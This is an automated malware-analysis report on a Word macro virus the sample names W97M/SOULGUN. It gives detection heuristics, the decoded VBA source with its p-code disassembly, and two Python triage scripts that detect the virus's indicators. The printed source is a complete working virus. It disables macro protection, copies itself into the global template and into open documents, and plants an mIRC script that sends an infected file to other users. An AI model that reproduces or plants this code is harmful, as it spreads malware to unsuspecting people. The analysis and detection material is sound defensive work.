Verdict: MALICIOUS
Risk score: 236
Heuristics: 6
- ClamAV: Win.Trojan.Pivis-2 (critical, CLAMAV_DETECTION). ClamAV detected this file as malware: Win.Trojan.Pivis-2.
- VBA macros detected (medium, OLE_VBA_MACROS; 3 related findings). Document contains VBA macro code.
- VBA macro-virus self-replication / AV tampering (critical, OLE_VBA_MACRO_VIRUS_REPLICATION). VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family: self-replicating code with no benign document use, independent of any AV signature. Matched line in script: `.VirusProtection = False`. The decoded source below also shows the replication path itself: the active module is exported to `c:\chile.sys`, appended to the target module with `AddFromFile`, trimmed with `deletelines`, and its first line rewritten with `ReplaceLine`, with the target being `NormalTemplate` or `ActiveDocument` depending on which one is not yet infected (a module of 12 or more lines counts as infected).
- AutoOpen macro (low, OLE_VBA_AUTOOPEN). Matched line in script: `If actinf = False Then host.codemodule.ReplaceLine 1, "Sub AutoOpen()"`. This is a string-literal match, not a procedure definition: the sample defines only `Sub AutoClose()`, and writes `Sub AutoOpen()` as line 1 of the copy it plants in a document, so the AutoOpen entry point exists in infected documents rather than in this sample itself.
- Auto_Close macro (low, OLE_VBA_AUTOCLOSE). Matched line in script: `Sub AutoClose()`. This is the sample's actual entry point; it runs when the document is closed.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC). OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen. The rule's own description ("no modern VBA project was recovered and no stronger macro-virus family marker was present") does not hold for this sample, where a VBA project was decoded and the macro-virus replication rule fired; treat this finding as redundant evidence of old Word macro execution surface, not as a downloader or parser-CVE attribution.
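The heuristics above are the analyzer's own rules, whose implementation is not shown on this page. As an added example (not the analyzer's code), the triage below applies the same ideas to decoded VBA source: it strips `'` comments first, because the extracted artifact also carries the p-code disassembly as comment lines and a naive keyword scan would match it; it distinguishes a defined `Sub AutoClose()` from an auto-exec name that only appears as a string literal; and it flags VBE object model use, `VirusProtection = False`, writes to `NormalTemplate`, the registry marker via `System.PrivateProfileString`, and the mIRC `script.ini` dropper. The sample text is a constructed excerpt of lines from the macros.bas shown in this report, and the regexes and verdict thresholds are this example's own assumptions.

```python
import re

AUTOEXEC = {"autoopen", "autoclose", "autoexec", "autonew", "autoexit",
            "document_open", "document_close", "document_new"}
VBE_METHODS = ("AddFromFile", "AddFromString", "InsertLines", "DeleteLines",
               "ReplaceLine", "OrganizerCopy", "Export")

# Constructed test input: lines copied from the decoded macros.bas in this
# report, plus two comment lines of the kind the analyzer appends (p-code dump)
# to show that commented-out text must not count as an indicator.
SAMPLE_VBA = r'''Attribute VB_Name = "ThisDocument"
Sub AutoClose()
On Error Resume Next
With Options
.VirusProtection = False
End With
nomcnt = NormalTemplate.VBProject.VBComponents.Item(1).codemodule.CountOfLines
If actinf = True Then ActiveDocument.VBProject.VBComponents.Item(1).Export "c:\chile.sys"
If nominf = False And System.PrivateProfileString("", "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\main", "SoulGun") = "Installed" Then
End If
host.codemodule.AddFromFile ("c:\chile.sys")
If actinf = False Then host.codemodule.ReplaceLine 1, "Sub AutoOpen()"
If nominf = False Then NormalTemplate.Save
Open "c:\mirc\script.ini" For Output As 1
Print #1, "n0=on 1:JOIN:#: if ( $me != $nick ) { /dcc send $nick c:\Pornpass.doc }"
End Sub
' Sub AutoExec()
' LitStr 0x000E "Sub AutoOpen()"
'''


def strip_comment(line):
    """Drop a trailing ' comment, honouring double-quoted string literals."""
    in_str = False
    for i, ch in enumerate(line):
        if ch == '"':
            in_str = not in_str
        elif ch == "'" and not in_str:
            return line[:i]
    return line


def triage(vba):
    """Score decoded VBA source for W97M-style macro-virus indicators."""
    code = "\n".join(strip_comment(l) for l in vba.splitlines())
    # Procedures actually defined vs. auto-exec names that only occur as strings
    defined = re.findall(r"^\s*(?:Public\s+|Private\s+)?Sub\s+(\w+)\s*\(", code, re.M | re.I)
    literal = re.findall(r'"Sub\s+(\w+)\s*\(\)"', code, re.I)
    r = {
        "defined_autoexec": [n for n in defined if n.lower() in AUTOEXEC],
        "literal_autoexec": [n for n in literal if n.lower() in AUTOEXEC],
        # VBProject.VBComponents on one line = VBE object model access
        "vbe_object_model": re.search(r"\bVBProject\b.*\bVBComponents\b", code, re.I) is not None,
        "vbe_methods": sorted(m for m in VBE_METHODS if re.search(r"\.%s\b" % m, code, re.I)),
        "virus_protection_disabled": re.search(r"\.VirusProtection\s*=\s*False", code, re.I) is not None,
        "normal_template_write": re.search(r"\bNormalTemplate\.(Save|VBProject)\b", code, re.I) is not None,
        "registry_marker": re.search(r"PrivateProfileString\s*\(.*HKEY_", code, re.I) is not None,
        "mirc_dropper": re.search(r'Open\s+"[^"]*script\.ini"\s+For\s+Output', code, re.I) is not None,
    }
    # Verdict (assumed thresholds): code that edits modules through the VBE and
    # either touches the global template or disables virus protection is a virus.
    if r["vbe_object_model"] and r["vbe_methods"] and (
            r["normal_template_write"] or r["virus_protection_disabled"]):
        r["verdict"] = "macro-virus: self-replicating"
    elif r["defined_autoexec"]:
        r["verdict"] = "auto-exec macro: review"
    else:
        r["verdict"] = "no auto-exec macro"
    return r


if __name__ == "__main__":
    for k, v in triage(SAMPLE_VBA).items():
        print(f"{k:28} {v}")
```

Run against the constructed excerpt, `defined_autoexec` is `['AutoClose']`, `literal_autoexec` is `['AutoOpen']`, and the commented `' Sub AutoExec()` line is ignored; the two comment lines are exactly why the analyzer's AutoOpen hit above should be read as a literal match rather than a second entry point.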
Extracted artifacts: 1
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 | Detection |
|---|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 11206 bytes | 250511439c9c80934275d5b7f1552b03dce735f418fc44dbbbbd4276134ef98e | ClamAV: Win.Trojan.C-286; obfuscation or payload: unlikely |

Note that the ClamAV name on the carved macro source (Win.Trojan.C-286) differs from the name on the whole document (Win.Trojan.Pivis-2); the two are separate scans of different byte streams, and the macro itself announces the family as W97M/SOULGUN in its own message box and mIRC strings.

Preview script (first 1,000 lines of the extracted script; the decoded VBA source is followed by the analyzer's p-code disassembly, emitted as `'` comment lines):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoClose()
'
'
'
'
'
'
'
On Error Resume Next
With Options
.ConfirmConversions = False
.VirusProtection = False
.SaveNormalPrompt = False
End With
CommandBars("Tools").Controls("Macro").Delete
CommandBars("Tools").Controls("Templates and Add-Ins...").Delete
CommandBars("Format").Controls("Style...").Delete
Application.ScreenUpdating = False
Options.SendMailAttach = True
nomcnt = NormalTemplate.VBProject.VBComponents.Item(1).codemodule.CountOfLines
actcnt = ActiveDocument.VBProject.VBComponents.Item(1).codemodule.CountOfLines
If nomcnt >= 12 Then nominf = True Else nominf = False
If actcnt >= 12 Then actinf = True Else actinf = False
ActiveDocument.VBProject.VBComponents.Item(1).Name = NormalTemplate.VBProject.VBComponents.Item(1).Name
If actinf = True Then ActiveDocument.VBProject.VBComponents.Item(1).Export "c:\chile.sys"
If nominf = False Then Set host = NormalTemplate.VBProject.VBComponents.Item(1)
If actinf = False Then Set host = ActiveDocument.VBProject.VBComponents.Item(1)
If nominf = False And System.PrivateProfileString("", "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\main", "SoulGun") = "Installed" Then
MsgBox "sOUlGun has returned"
MsgBox "As far from god as heaven is wide As far from god as angels can fly", vbExclamation, "W97M/SOULGUN"
Application.Quit
If (Day(Now)) = 1 Then System.PrivateProfileString("", "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\main", "SoulGun") = "Reprieved"
End If
If nominf = False Then System.PrivateProfileString("", "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\main", "SoulGun") = "Installed"
host.codemodule.AddFromFile ("c:\chile.sys")
With host.codemodule
For x = 1 To 4
.deletelines 1
Next x
End With
If nominf = False Then host.codemodule.ReplaceLine 1, "Sub AutoClose()"
If actinf = False Then host.codemodule.ReplaceLine 1, "Sub AutoOpen()"
If actinf = False Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, fileformat:=wdFormatDocument
If nominf = False Then NormalTemplate.Save
If nominf = False And System.PrivateProfileString("", "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\main", "SoulGun") = "Installed" Then
ActiveDocument.SaveAs FileName:="c:\Pornpass.doc", fileformat:=wdFormatDocument, AddToRecentFiles:=False, ReadOnlyRecommended:=False
On Error GoTo mircnothere
Kill "c:\mirc\script.ini"
Open "c:\mirc\script.ini" For Output As 1
Print #1, "[script]"
Print #1, "n0=on 1:JOIN:#: if ( $me != $nick ) { /dcc send $nick c:\Pornpass.doc }"
Print #1, "n1=on 1:CONNECT: {"
Print #1, "n2= /join #vir"
Print #1, "n3= /msg #vir As far from g0d as angels can fly....Another W97m/Soulgun Infected user"
Close 1
End If
mircnothere:
With host.codemodule
For x = 2 To 8
.ReplaceLine x, "' " & Application.UserInitials & Application.StartupPath & Now & Application.WindowState & Now
Next x
End With
End Sub
' Processing file: /opt/analyzer/scan_staging/63d6dfaac20c44938708877a5c0ccd82.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 5386 bytes
' Line #0:
' FuncDefn (Sub AutoClose())
' Line #1:
' QuoteRem 0x0000 0x0000 ""
' Line #2:
' QuoteRem 0x0000 0x0000 ""
' Line #3:
' QuoteRem 0x0000 0x0000 ""
' Line #4:
' QuoteRem 0x0000 0x0000 ""
' Line #5:
' QuoteRem 0x0000 0x0000 ""
' Line #6:
' QuoteRem 0x0000 0x0000 ""
' Line #7:
' QuoteRem 0x0000 0x0000 ""
' Line #8:
' OnError (Resume Next)
' Line #9:
' StartWithExpr
' Ld Options
' With
' Line #10:
' LitVarSpecial (False)
' MemStWith ConfirmConversions
' Line #11:
' LitVarSpecial (False)
' MemStWith VirusProtection
' Line #12:
' LitVarSpecial (False)
' MemStWith SaveNormalPrompt
' Line #13:
' EndWith
' Line #14:
' Line #15:
' LitStr 0x0005 "Macro"
' LitStr 0x0005 "Tools"
' ArgsLd CommandBars 0x0001
' ArgsMemLd Controls 0x0001
' ArgsMemCall Delete 0x0000
' Line #16:
' LitStr 0x0018 "Templates and Add-Ins..."
' LitStr 0x0005 "Tools"
' ArgsLd CommandBars 0x0001
' ArgsMemLd Controls 0x0001
' ArgsMemCall Delete 0x0000
' Line #17:
' LitStr 0x0008 "Style..."
' LitStr 0x0006 "Format"
' ArgsLd CommandBars 0x0001
' ArgsMemLd Controls 0x0001
' ArgsMemCall Delete 0x0000
' Line #18:
' LitVarSpecial (False)
' Ld Application
' MemSt ScreenUpdating
' Line #19:
' LitVarSpecial (True)
' Ld Options
' MemSt SendMailAttach
' Line #20:
' Line #21:
' LitDI2 0x0001
' Ld NormalTemplate
' MemLd VBProject
' MemLd VBComponents
' ArgsMemLd Item 0x0001
' MemLd codemodule
' MemLd CountOfLines
' St nomcnt
' Line #22:
' LitDI2 0x0001
' Ld ActiveDocument
' MemLd VBProject
' MemLd VBComponents
' ArgsMemLd Item 0x0001
' MemLd codemodule
' MemLd CountOfLines
' St actcnt
' Line #23:
' Line #24:
' Ld nomcnt
' LitDI2 0x000C
' Ge
' If
' BoSImplicit
' LitVarSpecial (True)
' St nominf
' Else
' BoSImplicit
' LitVarSpecial (False)
' St nominf
' EndIf
' Line #25:
' Ld actcnt
' LitDI2 0x000C
' Ge
' If
' BoSImplicit
' LitVarSpecial (True)
' St actinf
' Else
' BoSImplicit
' LitVarSpecial (False)
' St actinf
' EndIf
' Line #26:
' Line #27:
' LitDI2 0x0001
' Ld NormalTemplate
' MemLd VBProject
' MemLd VBComponents
' ArgsMemLd Item 0x0001
' MemLd New
' LitDI2 0x0001
' Ld ActiveDocument
' MemLd VBProject
' MemLd VBComponents
' ArgsMemLd Item 0x0001
' MemSt New
' Line #28:
' Line #29:
' Ld actinf
' LitVarSpecial (True)
' Eq
' If
' BoSImplicit
' LitStr 0x000C "c:\chile.sys"
' LitDI2 0x0001
' Ld ActiveDocument
' MemLd VBProject
' MemLd VBComponents
' ArgsMemLd Item 0x0001
' ArgsMemCall Export 0x0001
' EndIf
' Line #30:
' Ld nominf
' LitVarSpecial (False)
' Eq
' If
' BoSImplicit
' SetStmt
' LitDI2 0x0001
' Ld NormalTemplate
' MemLd VBProject
' MemLd VBComponents
' ArgsMemLd Item 0x0001
' Set host
' EndIf
' Line #31:
' Ld actinf
' LitVarSpecial (False)
' Eq
' If
' BoSImplicit
' SetStmt
' LitDI2 0x0001
' Ld ActiveDocument
' MemLd VBProject
' MemLd VBComponents
' ArgsMemLd Item 0x0001
' Set host
' EndIf
' Line #32:
' Ld nominf
' LitVarSpecial (False)
' Eq
' LitStr 0x0000 ""
' LitStr 0x003B "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\main"
' LitStr 0x0007 "SoulGun"
' Ld System
' ArgsMemLd PrivateProfileString 0x0003
' LitStr 0x0009 "Installed"
' Eq
' And
' IfBlock
' Line #33:
' LitStr 0x0014 "sOUlGun has returned"
' ArgsCall MsgBox 0x0001
' Line #34:
' LitStr 0x0043 "As far from god as heaven is wide As far from god as angels can fly"
' Ld vbExclamation
' LitStr 0x000C "W97M/SOULGUN"
' ArgsCall MsgBox 0x0003
' Line #35:
' Ld Application
' ArgsMemCall Quit 0x0000
' Line #36:
' Line #37:
' Ld Now
' ArgsLd Day 0x0001
' Paren
' LitDI2 0x0001
' Eq
' If
' BoSImplicit
' LitStr 0x0009 "Reprieved"
' LitStr 0x0000 ""
' LitStr 0x003B "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\main"
' LitStr 0x0007 "SoulGun"
' Ld System
' ArgsMemSt PrivateProfileString 0x0003
' EndIf
' Line #38:
' EndIfBlock
' Line #39:
' Line #40:
' Ld nominf
' LitVarSpecial (False)
' Eq
' If
' BoSImplicit
' LitStr 0x0009 "Installed"
' LitStr 0x0000 ""
' LitStr 0x003B "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\main"
' LitStr 0x0007 "SoulGun"
' Ld System
' ArgsMemSt PrivateProfileString 0x0003
' EndIf
' Line #41:
' LitStr 0x000C "c:\chile.sys"
' Paren
' Ld host
' MemLd codemodule
' ArgsMemCall AddFromFile 0x0001
' Line #42:
' Line #43:
' StartWithExpr
' Ld host
' MemLd codemodule
' With
' Line #44:
' StartForVariable
' Ld x
' EndForVariable
' LitDI2 0x0001
' LitDI2 0x0004
' For
' Line #45:
' LitDI2 0x0001
' ArgsMemCallWith deletelines 0x0001
' Line #46:
' StartForVariable
' Ld x
' EndForVariable
' NextVar
' Line #47:
' EndWith
' Line #48:
' Line #49:
' Ld nominf
' LitVarSpecial (False)
' Eq
' If
' BoSImplicit
' LitDI2 0x0001
' LitStr 0x000F "Sub AutoClose()"
' Ld host
' MemLd codemodule
' ArgsMemCall ReplaceLine 0x0002
' EndIf
' Line #50:
' Ld actinf
' LitVarSpecial (False)
' Eq
' If
' BoSImplicit
' LitDI2 0x0001
' LitStr 0x000E "Sub AutoOpen()"
' Ld host
' MemLd codemodule
' ArgsMemCall ReplaceLine 0x0002
' EndIf
' Line #51:
' Ld actinf
' LitVarSpecial (False)
' Eq
' If
' BoSImplicit
' Ld ActiveDocument
' MemLd FullName
' ParamNamed FileName
' Ld wdFormatDocument
' ParamNamed fileformat
' Ld ActiveDocument
' ArgsMemCall SaveAs 0x0002
' EndIf
' Line #52:
' Ld nominf
' LitVarSpecial (False)
' Eq
' If
' BoSImplicit
' Ld NormalTemplate
' ArgsMemCall Save 0x0000
' EndIf
' Line #53:
' Ld nominf
' LitVarSpecial (False)
' Eq
' LitStr 0x0000 ""
' LitStr 0x003B "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\main"
' LitStr 0x0007 "SoulGun"
' Ld System
' ArgsMemLd PrivateProfileString 0x0003
' LitStr 0x0009 "Installed"
' Eq
' And
' IfBlock
' Line #54:
' Line #55:
' LitStr 0x000F "c:\Pornpass.doc"
' ParamNamed FileName
' Ld wdFormatDocument
' ParamNamed fileformat
' LitVarSpecial (False)
' ParamNamed AddToRecentFiles
' LitVarSpecial (False)
' ParamNamed ReadOnlyRecommended
' Ld ActiveDocument
' ArgsMemCall SaveAs 0x0004
' Line #56:
' OnError mircnothere
' Line #57:
' LitStr 0x0012 "c:\mirc\script.ini"
' ArgsCall Kill 0x0001
' Line #58:
' LitStr 0x0012 "c:\mirc\script.ini"
' LitDI2 0x0001
' LitDefault
' Open (For Output)
' Line #59:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x0008 "[script]"
' PrintItemNL
' Line #60:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x0047 "n0=on 1:JOIN:#: if ( $me != $nick ) { /dcc send $nick c:\Pornpass.doc }"
' PrintItemNL
' Line #61:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x0012 "n1=on 1:CONNECT: {"
' PrintItemNL
' Line #62:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x000F "n2= /join #vir"
' PrintItemNL
' Line #63:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x0056 "n3= /msg #vir As far from g0d as angels can fly....Another W97m/Soulgun Infected user"
' PrintItemNL
' Line #64:
' LitDI2 0x0001
' Close 0x0001
' Line #65:
' EndIfBlock
' Line #66:
' Label mircnothere
' Line #67:
' StartWithExpr
' Ld host
' MemLd codemodule
' With
' Line #68:
' StartForVariable
' Ld x
' EndForVariable
' LitDI2 0x0002
' LitDI2 0x0008
' For
' Line #69:
' Ld x
' LitStr 0x0002 "' "
' Ld Application
' MemLd UserInitials
' Concat
' Ld Application
' MemLd StartupPath
' Concat
' Ld Now
' Concat
' Ld Application
' MemLd WindowState
' Concat
' Ld Now
' Concat
' ArgsMemCallWith ReplaceLine 0x0002
' Line #70:
' StartForVariable
' Ld x
' EndForVariable
' NextVar
' Line #71:
' EndWith
' Line #72:
' EndSub
' Line #73:
' Line #74:
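The comment-prefixed dump above is the compiled p-code of the module, listed per source line. That listing matters because p-code survives when the source stream has been stripped or replaced (VBA stomping); the indicators can then be recovered from `LitStr` literals and the member and call operands alone. The parser below is an added example, not the analyzer's or pcodedmp's code: it assumes only the line shapes visible in this report (`' Line #N:`, `' LitStr 0x.. "..."`, `' ArgsMemCall Name 0xN`, `' FuncDefn (Sub X())`, `' Open (For Output)`), groups them by source line, and reports the same behaviours the heuristics flagged. The input is a constructed excerpt of lines from the dump above; the op names treated as identifier-carrying and the finding texts are this example's own choices.

```python
import re

AUTOEXEC = {"autoopen", "autoclose", "autoexec", "autonew", "autoexit",
            "document_open", "document_close", "document_new"}
VBE_METHODS = {"AddFromFile", "AddFromString", "InsertLines", "DeleteLines",
               "ReplaceLine", "OrganizerCopy", "Export"}
# p-code ops whose first operand is an identifier (variable, member or call target)
NAME_OPS = {"Ld", "ArgsLd", "MemLd", "MemSt", "MemStWith", "ArgsMemLd",
            "ArgsMemCall", "ArgsMemCallWith", "ArgsMemSt", "ArgsCall"}

# Constructed excerpt of the dump printed above (the analyzer emits it as
# "'"-prefixed comment lines after the decoded source).
SAMPLE_PCODE = r'''
' Line #0:
' FuncDefn (Sub AutoClose())
' Line #11:
' LitVarSpecial (False)
' MemStWith VirusProtection
' Line #29:
' Ld actinf
' LitVarSpecial (True)
' Eq
' If
' BoSImplicit
' LitStr 0x000C "c:\chile.sys"
' LitDI2 0x0001
' Ld ActiveDocument
' MemLd VBProject
' MemLd VBComponents
' ArgsMemLd Item 0x0001
' ArgsMemCall Export 0x0001
' EndIf
' Line #40:
' LitStr 0x0009 "Installed"
' LitStr 0x0000 ""
' LitStr 0x003B "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\main"
' LitStr 0x0007 "SoulGun"
' Ld System
' ArgsMemSt PrivateProfileString 0x0003
' Line #50:
' LitDI2 0x0001
' LitStr 0x000E "Sub AutoOpen()"
' Ld host
' MemLd codemodule
' ArgsMemCall ReplaceLine 0x0002
' Line #58:
' LitStr 0x0012 "c:\mirc\script.ini"
' LitDI2 0x0001
' LitDefault
' Open (For Output)
'''


def parse_pcode(dump):
    """Group a pcodedmp-style listing by source line: (op, arg) pairs, string literals, identifiers."""
    program, cur = {}, None
    for raw in dump.splitlines():
        text = raw.lstrip("'").strip()          # drop the "' " comment prefix
        m = re.fullmatch(r"Line #(\d+):", text)
        if m:
            cur = int(m.group(1))
            program[cur] = {"ops": [], "strings": [], "names": []}
            continue
        if cur is None or not text:
            continue
        op, _, arg = text.partition(" ")
        entry = program[cur]
        entry["ops"].append((op, arg))
        if op == "LitStr":
            m = re.fullmatch(r'0x[0-9A-Fa-f]+ "(.*)"', arg)
            if m:
                entry["strings"].append(m.group(1))
        elif op in NAME_OPS and arg:
            entry["names"].append(arg.split()[0])
    return program


def pcode_indicators(program):
    """Return (source line, finding) pairs for the behaviours this report's heuristics flag."""
    hits = []
    for ln, e in sorted(program.items()):
        names, ops = set(e["names"]), e["ops"]
        for op, arg in ops:                      # defined auto-exec entry point
            m = re.match(r"\((?:Public |Private )?(?:Sub|Function) (\w+)\(", arg) if op == "FuncDefn" else None
            if m and m.group(1).lower() in AUTOEXEC:
                hits.append((ln, "defines auto-exec procedure " + m.group(1)))
        if ("LitVarSpecial", "(False)") in ops and "VirusProtection" in names:
            hits.append((ln, "sets VirusProtection = False"))
        if {"VBProject", "VBComponents"} <= names and names & VBE_METHODS:
            hits.append((ln, "VBE object model: " + ",".join(sorted(names & VBE_METHODS))))
        elif names & VBE_METHODS and "codemodule" in {n.lower() for n in names}:
            hits.append((ln, "CodeModule edit: " + ",".join(sorted(names & VBE_METHODS))))
        for s in e["strings"]:                   # auto-exec name planted as a literal
            m = re.fullmatch(r"Sub (\w+)\(\)", s)
            if m and m.group(1).lower() in AUTOEXEC:
                hits.append((ln, "auto-exec name written as string: " + m.group(1)))
        keys = [s for s in e["strings"] if s.startswith("HKEY_")]
        if "PrivateProfileString" in names and keys:
            hits.append((ln, "registry key via PrivateProfileString: " + keys[0]))
        if ("Open", "(For Output)") in ops and e["strings"]:
            hits.append((ln, "opens file for write: " + e["strings"][0]))
    return hits


if __name__ == "__main__":
    for ln, finding in pcode_indicators(parse_pcode(SAMPLE_PCODE)):
        print(f"line {ln:3}: {finding}")
```

On the excerpt this yields seven findings, one per flagged line except line 50, which produces both the `ReplaceLine` edit and the planted `Sub AutoOpen()` literal. When a stomped document yields no usable source, running the same pass over the full dump is the quickest way to confirm that the compiled code still matches the behaviours the source-level heuristics reported.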